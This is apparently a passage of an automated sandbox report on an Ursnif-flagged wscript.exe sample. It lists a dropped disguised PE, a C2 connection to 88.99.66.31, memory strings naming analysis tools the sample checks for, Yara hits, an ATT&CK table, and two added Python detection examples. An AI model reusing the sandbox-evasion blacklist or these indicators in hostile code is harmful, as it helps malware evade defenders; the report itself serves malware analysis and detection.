Source: wscript.exe, 00000000.00000003.711820977.000001C8B6690000.00000004.00000001.sdmp | Binary or memory string: Hyper-V RAW
Source: wscript.exe, 00000000.00000003.711801004.000001C8B6389000.00000004.00000001.sdmp | Binary or memory string: Hyper-V RAWa

            HIPS / PFW / Operating System Protection Evasion:

            Benign windows process drops PE files
            Source: C:\Windows\System32\wscript.exe | File created: Oxnard.rb.0.dr
            System process connects to network (likely due to code injection or exploit)
            Source: C:\Windows\System32\wscript.exe | Network Connect: 88.99.66.31 187
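            The two signatures above rest on two telemetry points that any endpoint sensor already emits: a script host (wscript.exe) writing a PE into %TEMP% under a non-executable name (Oxnard.rb, which the report lists as a dropped PE), and the same script host opening a connection to a public address (88.99.66.31, port 187). The Python below is an added example and is not code from the report or from the sample: it models both checks over constructed Sysmon-style events (Event ID 11 FileCreate and Event ID 3 NetworkConnect), with a hand-built minimal PE header standing in for the dropped file. The event dicts, the script-host list, the PE-extension list and the alert names are assumptions of this example, not fields or rules from the report.

```python
import ipaddress
import ntpath
import struct

# Script hosts that should not normally write executables or reach the internet
# on their own (assumption of this example; extend for your environment).
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
PE_EXTENSIONS = {".exe", ".dll", ".sys", ".scr", ".ocx", ".cpl", ".drv"}


def is_pe(data: bytes) -> bool:
    """True if data starts with an MZ header whose e_lfanew points at 'PE\\0\\0'."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    return data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def pe_with_wrong_extension(path: str, data: bytes) -> bool:
    """PE content stored under an extension that is not an executable type."""
    ext = ntpath.splitext(path)[1].lower()
    return is_pe(data) and ext not in PE_EXTENSIONS


def make_fake_pe() -> bytes:
    """Constructed stand-in for the dropped file: DOS header + PE signature only."""
    header = bytearray(0x40)
    header[:2] = b"MZ"
    struct.pack_into("<I", header, 0x3C, 0x40)   # e_lfanew -> right after the DOS header
    return bytes(header) + b"PE\x00\x00"


FAKE_PE = make_fake_pe()
DROPPED = r"C:\Users\user\AppData\Local\Temp\Oxnard.rb"

# Constructed Sysmon-style events mirroring the two signatures in this section.
SAMPLE_EVENTS = [
    {"EventID": 11, "Image": r"C:\Windows\System32\wscript.exe", "TargetFilename": DROPPED},
    {"EventID": 3, "Image": r"C:\Windows\System32\wscript.exe",
     "DestinationIp": "88.99.66.31", "DestinationPort": 187},
    {"EventID": 3, "Image": r"C:\Windows\System32\wscript.exe",
     "DestinationIp": "10.0.0.5", "DestinationPort": 445},        # private: not alerted
    {"EventID": 3, "Image": r"C:\Windows\explorer.exe",
     "DestinationIp": "203.0.113.10", "DestinationPort": 443},    # not a script host
]


def script_host_alerts(events, file_contents=None):
    """Return (alert, image, detail) tuples for the two behaviours.

    file_contents maps TargetFilename -> bytes, standing in for the file fetch
    an EDR would perform when a FileCreate event fires.
    """
    file_contents = file_contents or {}
    alerts = []
    for ev in events:
        image = ntpath.basename(ev.get("Image", "")).lower()
        if image not in SCRIPT_HOSTS:
            continue
        if ev["EventID"] == 3:
            dst = ipaddress.ip_address(ev["DestinationIp"])
            if not (dst.is_private or dst.is_loopback):
                alerts.append(("script_host_public_connect", image,
                               f"{ev['DestinationIp']}:{ev['DestinationPort']}"))
        elif ev["EventID"] == 11:
            target = ev["TargetFilename"]
            data = file_contents.get(target)
            if data is not None and pe_with_wrong_extension(target, data):
                alerts.append(("script_host_drops_disguised_pe", image, target))
    return alerts


if __name__ == "__main__":
    for alert in script_host_alerts(SAMPLE_EVENTS, {DROPPED: FAKE_PE}):
        print(*alert)
```

            The extension check is deliberately content-based: the sample's dropper would have passed a filename-only rule, because .rb is not an extension most allow-lists think about. On a real sensor the is_private test should be extended with your own egress proxy and update-server ranges, otherwise every wscript.exe logon script that talks to an internal web service will fire.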
            Source: C:\Windows\System32\wscript.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\prestige.zip VolumeInformation
            Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
            Source: wscript.exe, 00000000.00000003.712694780.000001C8B3A4B000.00000004.00000001.sdmp | Binary or memory string: procmon.exe
            Source: wscript.exe, 00000000.00000003.712789236.000001C8B3A2A000.00000004.00000001.sdmp | Binary or memory string: tcpview.exe
            Source: wscript.exe, 00000000.00000003.712694780.000001C8B3A4B000.00000004.00000001.sdmp | Binary or memory string: wireshark.exe
            Source: wscript.exe, 00000000.00000003.712694780.000001C8B3A4B000.00000004.00000001.sdmp | Binary or memory string: avz.exe
            Source: wscript.exe, 00000000.00000003.712694780.000001C8B3A4B000.00000004.00000001.sdmp | Binary or memory string: cports.exe
            Source: wscript.exe, 00000000.00000003.712694780.000001C8B3A4B000.00000004.00000001.sdmp | Binary or memory string: lordpe.exe
            Source: wscript.exe, 00000000.00000003.712694780.000001C8B3A4B000.00000004.00000001.sdmp | Binary or memory string: icesword.exe
            Source: wscript.exe, 00000000.00000003.712789236.000001C8B3A2A000.00000004.00000001.sdmp | Binary or memory string: autoruns.exe
            Source: wscript.exe, 00000000.00000003.712789236.000001C8B3A2A000.00000004.00000001.sdmp | Binary or memory string: ollydbg.exe
            Source: wscript.exe, 00000000.00000003.712694780.000001C8B3A4B000.00000004.00000001.sdmp | Binary or memory string: regshot.exe
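            The process names recovered from wscript.exe memory here (procmon.exe, wireshark.exe, autoruns.exe and the rest) and in the sandbox-evasion section earlier (HOOKANAAPP.EXE, FRIDA-WINJECTOR-HELPER-64.EXE, TCPDUMP.EXE, DUMPCAP.EXE and others) are the blacklist the script compares against running processes before it commits to the payload. The Python below is an added example, not code from the report or from the sample: it pulls the executable names out of the raw memory strings exactly as the report prints them (including the stray prefix and suffix characters around some of them) and checks a process list, for instance your own analysis VM's, against that blacklist so you can see which tool names would trip this sample. The process list used for the demonstration and the name regex are this example's assumptions.

```python
import re
from typing import Iterable, Optional

# Raw "Binary or memory string" values exactly as listed in this report, from
# both the sandbox-evasion section and the HIPS/PFW section. The stray
# characters around some names ("U.", "A9$", trailing "T"/"Q") are how they
# appear in the wscript.exe memory dumps, not part of the tool names.
REPORT_STRINGS = [
    "HOOKANAAPP.EXE", ":FRIDA-WINJECTOR-HELPER-64.EXE", "TCPDUMP.EXE",
    "FILEMON.EXET", "U.SANDBOXIEDCOMLAUNCH.EXE", "A9$BEHAVIORDUMPER.EXEQ",
    "DUMPCAP.EXE", "procmon.exe", "tcpview.exe", "wireshark.exe", "avz.exe",
    "cports.exe", "lordpe.exe", "icesword.exe", "autoruns.exe", "ollydbg.exe",
    "regshot.exe",
]

# Executable name = a run of name characters followed by ".exe", case-insensitive.
# Anything outside that run (the garbage prefixes/suffixes) is discarded.
_EXE_NAME = re.compile(r"([A-Za-z0-9_-]+\.exe)", re.IGNORECASE)


def extract_tool_names(strings: Iterable[str]) -> set:
    """Lower-cased executable names found in raw memory strings."""
    names = set()
    for s in strings:
        match = _EXE_NAME.search(s)
        if match:
            names.add(match.group(1).lower())
    return names


BLACKLIST = extract_tool_names(REPORT_STRINGS)


def running_analysis_tools(process_list: Iterable[str],
                           blacklist: Optional[set] = None) -> set:
    """Process names from process_list that the sample's blacklist would match.

    Comparison is case-insensitive on the bare image name; pass full paths
    through ntpath.basename first if your process listing includes them.
    """
    blacklist = BLACKLIST if blacklist is None else blacklist
    return {p.lower() for p in process_list if p.lower() in blacklist}


if __name__ == "__main__":
    # Constructed process list standing in for `tasklist` output on an analysis VM.
    vm_processes = ["explorer.exe", "svchost.exe", "ProcMon.exe",
                    "Wireshark.exe", "x64dbg.exe"]
    print(sorted(BLACKLIST))
    print(running_analysis_tools(vm_processes))   # x64dbg.exe is not on this sample's list
```

            The practical use is the other way round from the malware's: run the check against your sandbox image and rename or hide whatever it flags before detonating, since the sample bails out (and the Ursnif payload never appears) when any of these names is present.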

            Stealing of Sensitive Information:

            Yara detected Ursnif
            Source: Yara match | File source: 00000007.00000003.841219747.0000000004DC8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000007.00000003.841280724.0000000004DC8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000007.00000002.844945859.0000000004DC8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000007.00000003.841043510.0000000004DC8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000007.00000003.841145092.0000000004DC8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000007.00000003.841189737.0000000004DC8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000007.00000003.841251106.0000000004DC8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000007.00000003.841003286.0000000004DC8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000007.00000003.841100047.0000000004DC8000.00000004.00000040.sdmp, type: MEMORY

            Remote Access Functionality:

            Yara detected Ursnif
            Source: Yara match | File source: 00000007.00000003.841219747.0000000004DC8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000007.00000003.841280724.0000000004DC8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000007.00000002.844945859.0000000004DC8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000007.00000003.841043510.0000000004DC8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000007.00000003.841145092.0000000004DC8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000007.00000003.841189737.0000000004DC8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000007.00000003.841251106.0000000004DC8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000007.00000003.841003286.0000000004DC8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000007.00000003.841100047.0000000004DC8000.00000004.00000040.sdmp, type: MEMORY

            Mitre Att&ck Matrix

            | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
            | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- |
            | Valid Accounts | Windows Management Instrumentation121 | Path Interception | Process Injection11 | Masquerading11 | OS Credential Dumping | Query Registry1 | Remote Services | Data from Local System | Exfiltration Over Other Network Medium | Encrypted Channel2 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
            | Default Accounts | Scripting121 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Virtualization/Sandbox Evasion4 | LSASS Memory | Security Software Discovery141 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Ingress Tool Transfer3 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
            | Domain Accounts | Exploitation for Client Execution1 | Logon Script (Windows) | Logon Script (Windows) | Process Injection11 | Security Account Manager | Virtualization/Sandbox Evasion4 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol3 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
            | Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Scripting121 | NTDS | Remote System Discovery1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol4 | SIM Card Swap | Carrier Billing Fraud | |
            | Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Obfuscated Files or Information1 | LSA Secrets | File and Directory Discovery2 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings | |
            | Replication Through Removable Media | Launchd | Rc.common | Rc.common | File Deletion1 | Cached Domain Credentials | System Information Discovery24 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features | |

            Behavior Graph

            [Behavior graph (image). Legend: Process; Signature; Created File; DNS/IP Info; Is Dropped; Is Windows Process; Number of created Registry Values; Number of created Files; Visual Basic; Delphi; Java; .Net C# or VB.NET; C, C++ or other language; Is malicious; Internet]